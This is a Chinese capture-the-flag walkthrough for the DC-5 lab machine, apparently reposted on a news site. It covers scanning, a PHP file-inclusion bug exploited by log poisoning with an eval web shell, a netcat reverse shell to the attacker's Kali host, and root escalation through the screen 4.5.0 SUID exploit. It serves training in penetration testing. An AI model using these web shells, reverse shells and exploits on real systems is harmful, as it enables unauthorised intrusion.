DC-5
1.取得靶機,将靶機複制在自己電腦上,打開靶機
選擇編輯此虛拟機,點擊網絡配适器,選擇NAT模式然後确定
開啟此虛拟機
到這步後我們開啟kali虛拟機,同樣選擇編輯此虛拟機,點擊網絡配适器,選擇NAT模式然後确定
打開kali虛拟機,其密碼為kali
我們先獲取root權限,輸入su root,password為123456(Linux内輸入password是看不見的)
先用ifconfig查看kali的ip地址為192.168.126.129
我們用nmap掃描收集信息,輸入nmap -sP 192.168.126.0/24 -oN nmap.sV
得到靶機ip:192.168.126.132,對其進行端口掃描
可以看到開放了80端口和111端口,111端口是RPC服務,感覺沒有什麼可以利用的點,我們去浏覽器訪問80端口試試(可以打開kali自帶的火狐浏覽器,使用kali自帶浏覽器前需要打開burpsuit,也可以用自己電腦的浏覽器)
輸入剛剛獲得的靶機ip,例如我的就是http://192.168.126.132
發現這是一個動态頁面,可以嘗試去提交一些東西。
我們點擊右上角Contact,往下滑發現可以輸入
提交後可以發現,本人電腦的Microsoft Edge因為改成了翻譯系統,一般情況會顯示DC-5 is alive
掃描web目錄,輸入dirb http://192.168.126.132
很可惜此處沒有太多有價值的東西,繼續浏覽可以發現contact可以發現年份會随着頁面刷新而刷新
之前在thinkyou.php中看到了這種情況(網頁刷新一次,年份都會發生變化),因此我們猜測thinkyou.php調用了footer.php,于是想到了文件包含漏洞,輸入footer.php試試
看見頁面變化,我們回到kali,用kali自帶的burpsuite進行抓包
關于burpsuite的詳細配置教程我放在另外一個文檔裡面,沒有配置的小夥伴可以先配置一下
打開burpsuite後,返回浏覽器界面
在開着intercept on的同時刷新浏覽器頁面(回到浏覽器按下f5)burp會自動抓包
點擊Action,選擇send to Repeater發送到Repeater
利用access.log。抓包在burpsuite-repeater中,把url修改為一句話木馬 Get <?php phpinfo();?> ,回顯400 bad request
返回浏覽器查看,哭看見頁面發生變化
滑到最底下是這樣的,可以看見顯示了php信息,意識到可以通過這個方式寫入木馬
我們返回burpsuite,寫入一句話木馬 GET <?php @eval($_POST['1234'];?> .
(注意,這裡的POST['']裡面的内容是可以更改的,也就是之後用蟻劍連接的密碼
接着我們使用蟻劍連接,此處我的蟻劍是windows版本的,所以密碼就是POST内的内容1234
點擊添加數據
點擊測試連接,可以看見連接成功
我們回到kali,輸入nc -lvvp 1234開啟這個端口的監聽
然後在蟻劍中,點擊右鍵,選擇虛拟終端,輸入nc -e /bin/bash 192.168.126.129 1234進行shell反彈
可以在kali中看見成功
返回kali交互式 輸入python -c 'import pty;pty.spawn("/bin/bash")'
使用find / -perm -4000 2>/dev/null查找具有SUID權限的文件,發現screen-4.5.0。
使用searchsploit查找該命令漏洞:searchsploit screen 4.5.0 -w
兩個文件是相同的,41152.txt是告訴你怎麼做,之前的靶機也出現過,顯然41154.sh已經把文件給了,所以選擇下載41154.sh
發現有兩個漏洞
先查看第一個
将第一個複制到桌面
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
查看該文件
發現其在 /tmp 路徑下編譯了兩個 c,并執行了若幹命令
按照腳本提示,先将第一部分内容寫到libhax.c中(一共有三個部分)
第一步在桌面創建一個文件夾存放三個部分的腳本
使用命令vim創建第一個libhax.c
然後編譯這個腳本
gcc -fPIC -shared -ldl -o libhax.so libhax.c
、
使用vim命令創建第二個rootshell.c,複制粘貼完内容後按下esc輸入:wq保存退出
再編譯
gcc -o rootshell rootshell.c
最後一個部分dc5.sh同理,但是需要注意的是下面需要轉換一下格式
執行完命令後,可以看見在桌面home/dc-5文件夾有五個文件
将帶有.c的文件删除,在kali中使用rm命令
再回到文件夾内可以看見
然後我們回到中國蟻劍,将文件上傳到tmp文件裡面,需要注意的是我們一定要講文件傳到根目錄下,而不是var,/var是源碼
然後重命名,将路徑去掉
回到kali反彈的shell(步驟和之前一樣),進入到天麻片、目錄裡面
然後為dc5.sh添加可以執行權限,輸入chmod x dc5.sh
驗證權限,切換到/root根目錄下找到flag,滲透成功
更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!
zpostcode 
Recruit 
weather 
mreligion 
Yellowpages 
sport 
constellation 
shopping 
name 
game 
directory 
literature 
Word 
tour 
furnish 
Lottery 
tftnews 
lyrics 
News 
digital 
car 
dir 
Edu 
Finance 
